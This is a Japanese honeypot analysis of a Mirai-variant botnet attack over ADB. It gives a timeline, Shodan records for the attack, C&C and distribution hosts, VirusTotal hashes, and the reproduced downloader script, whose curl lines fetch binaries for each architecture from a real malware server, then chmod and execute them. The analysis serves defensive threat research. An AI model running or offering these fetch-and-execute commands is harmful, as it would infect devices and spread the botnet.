家で運用しているT-PodADBハニーポットで観測された攻撃についての分析
この攻撃は、わずか45秒という短時間で複数のマルウェアをダウンロード・実行する自動化された攻撃であり、Mirai亜種の特徴を持つボットネット感染攻撃だと考えられる。

攻撃概要


攻撃ログ

攻撃の概要

攻撃の特徴


攻撃の流れ

タイムライン

時刻 (UTC) イベント 詳細
02:24:21.481 ADB接続開始 TCP/5555への初期接続
02:24:21.836 コマンド実行 複合コマンドライン実行
02:24:22.133 wayne.sh取得 第一ダウンローダーの取得
02:24:22.284 carlo.sh取得 第二ダウンローダーの取得
02:24:22.434 adb.sh取得(1) メインダウンローダーの取得
02:24:22.577 adb.sh取得(2) 冗長化による再取得
02:24:22.716 adb.sh取得(3) 冗長化による再取得
02:24:22.860 adb.sh取得(4) 冗長化による再取得
02:25:07.016 セッション終了 45.54秒後に切断

このコマンドから考えられること


攻撃インフラ

攻撃元 (176.65.148.200)

shodan host 176.65.148.200
176.65.148.200
Hostnames:               hosted-by.pfcloud.io
City:                    Aachen
Country:                 Germany
Organization:            Pfcloud UG
Updated:                 2025-08-10T05:00:35.045740
Number of open ports:    1
Vulnerabilities:         CVE-2023-51385	CVE-2016-20012	CVE-2018-15919	CVE-2017-15906	CVE-2021-36368	CVE-2025-26465	CVE-2023-51767	CVE-2018-20685	CVE-2018-15473	CVE-2020-14145	CVE-2020-15778	CVE-2023-48795	CVE-2023-38408	CVE-2007-2768	CVE-2008-3844	CVE-2019-6111	CVE-2019-6110	CVE-2021-41617	CVE-2025-32728	CVE-2019-6109

Ports:
     22/tcp OpenSSH (7.4)

C&Cサーバー (209.141.32.42)

shodan host 209.141.32.42
209.141.32.42
Hostnames:               LAS.BBKEN.NET
City:                    Paradise
Country:                 United States
Organization:            FranTech Solutions
Updated:                 2025-08-14T12:46:49.008473
Number of open ports:    2
Vulnerabilities:         CVE-2014-0117	CVE-2017-7679	CVE-2017-9798	CVE-2015-3185	CVE-2015-3184	CVE-2015-3183	CVE-2013-4365	CVE-2022-28330	CVE-2021-32791	CVE-2021-32792	CVE-2023-31122	CVE-2024-38476	CVE-2024-38477	CVE-2024-38474	CVE-2024-38475	CVE-2024-38472	CVE-2024-38473	CVE-2009-0796	CVE-2014-0118	CVE-2022-31813	CVE-2020-1927	CVE-2011-2688	CVE-2017-3167	CVE-2023-38709	CVE-2021-32786	CVE-2021-32785	CVE-2007-4723	CVE-2021-44790	CVE-2016-4975	CVE-2020-13938	CVE-2020-35452	CVE-2022-22719	CVE-2024-47252	CVE-2020-1934	CVE-2021-34798	CVE-2019-0217	CVE-2024-24795	CVE-2014-3523	CVE-2013-5704	CVE-2019-17567	CVE-2013-6438	CVE-2024-42516	CVE-2012-4360	CVE-2014-0231	CVE-2024-39573	CVE-2021-26690	CVE-2021-26691	CVE-2019-0220	CVE-2025-49812	CVE-2022-30556	CVE-2021-39275	CVE-2014-3581	CVE-2016-0736	CVE-2022-29404	CVE-2018-1312	CVE-2006-20001	CVE-2019-10092	CVE-2014-0226	CVE-2022-22721	CVE-2022-22720	CVE-2017-15710	CVE-2017-15715	CVE-2019-10098	CVE-2016-5387	CVE-2021-40438	CVE-2011-1176	CVE-2022-23943	CVE-2018-17199	CVE-2018-1301	CVE-2018-1302	CVE-2018-1303	CVE-2022-36760	CVE-2023-25690	CVE-2020-11985	CVE-2013-4352	CVE-2022-26377	CVE-2014-0098	CVE-2016-8743	CVE-2024-40898	CVE-2024-43204	CVE-2012-3526	CVE-2016-8612	CVE-2009-2299	CVE-2012-4001	CVE-2022-37436	CVE-2017-9788	CVE-2014-8109	CVE-2013-2765	CVE-2024-43394	CVE-2016-2161	CVE-2015-0228	CVE-2013-0941	CVE-2013-0942	CVE-2018-1283	CVE-2022-28615	CVE-2022-28614

Ports:
     22/tcp OpenSSH (9.6p1 Ubuntu 3ubuntu13.13)
     80/tcp Apache httpd (2.4.6)
	|-- HTTP title: Apache HTTP Server Test Page powered by CentOS

マルウェア配信サーバー (23.146.184.21)

Fofa

基本情報

実際に配信サーバーにアクセスできる

http[:]//23.146[.]184.21/bins/


ダウンローダー

VirusTotalでの検索

スクリプト

観測された3つのスクリプト(wayne.sh, carlo.sh, adb.sh)は、基本的に同一の機能を異なるツールで実装している

共通実行パターン

[download_tool] http[:]//23.146[.]184.21/bins/systemd.[arch]
chmod 777 systemd.[arch]
./systemd.[arch] systemctl[arch_suffix]

ツール別実装:

wayne.shでの例

curl http[:]//23.146[.]184.21/bins/systemd.arm; chmod 777 systemd.arm; ./systemd.arm systemctlarm
curl http[:]//23.146[.]184.21/bins/systemd.arm5; chmod 777 systemd.arm5; ./systemd.arm5 systemctlarm5
curl http[:]//23.146[.]184.21/bins/systemd.arm6; chmod 777 systemd.arm6; ./systemd.arm6 systemctlarm6
curl http[:]//23.146[.]184.21/bins/systemd.arm7; chmod 777 systemd.arm7; ./systemd.arm7 systemctlarm7
curl http[:]//23.146[.]184.21/bins/systemd.m68k; chmod 777 systemd.m68k; ./systemd.m68k systemctl
curl http[:]//23.146[.]184.21/bins/systemd.mips; chmod 777 systemd.mips; ./systemd.mips systemctlmips
curl http[:]//23.146[.]184.21/bins/systemd.mpsl; chmod 777 systemd.mpsl; ./systemd.mpsl systemctlmpsl
curl http[:]//23.146[.]184.21/bins/systemd.ppc; chmod 777 systemd.ppc; ./systemd.ppc systemctl
curl http[:]//23.146[.]184.21/bins/systemd.sh4; chmod 777 systemd.sh4; ./systemd.sh4 systemctl
curl http[:]//23.146[.]184.21/bins/systemd.spc; chmod 777 systemd.spc; ./systemd.spc systemctl
curl http[:]//23.146[.]184.21/bins/systemd.x86; chmod 777 systemd.x86; ./systemd.x86 systemctlx86
curl http[:]//23.146[.]184.21/bins/systemd.x86_64; chmod 777 systemd.x86_64; ./systemd.x86_64 systemctlx86_64

rm $0

バイナリファイル

VirusTotalでは、アンチマルウェアソフトによって、Miraiの亜種であると判定されている

表層解析

デバイス固有の認証情報とは

C&C通信

Mirai亜種に含まれると考えられる典型的な文字列の一部が確認できる

Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS

VirusTotalでの検索

ファイル SHA256 検出率 主要分類
wayne.sh 42f2ef51bd75c0ae260ae9e1cd2221ed13c702cce12a242a8cc277fd157b17f9 20/47 (42.6%) Downloader/Shell.Generic
carlo.sh cdb35d1d917f58cc22c09d3f0c060b5deae9fd75d89b076af00a6ec52f9accc3 27/62 (43.5%) Downloader/BASH/Mirai
adb.sh 5b9210db87cfb74d5a953470ac82b04621cf663632b8f37a000f2aa88f103869 18/61 (29.5%) Downloader/BASH/Mirai

対策

ADBセキュリティの強化


まとめ


参考文献

ダウンローダーのVirustotal

バイナリファイルのVirusTotal

攻撃インフラのShodan・Fofa

Mirai亜種に関する文献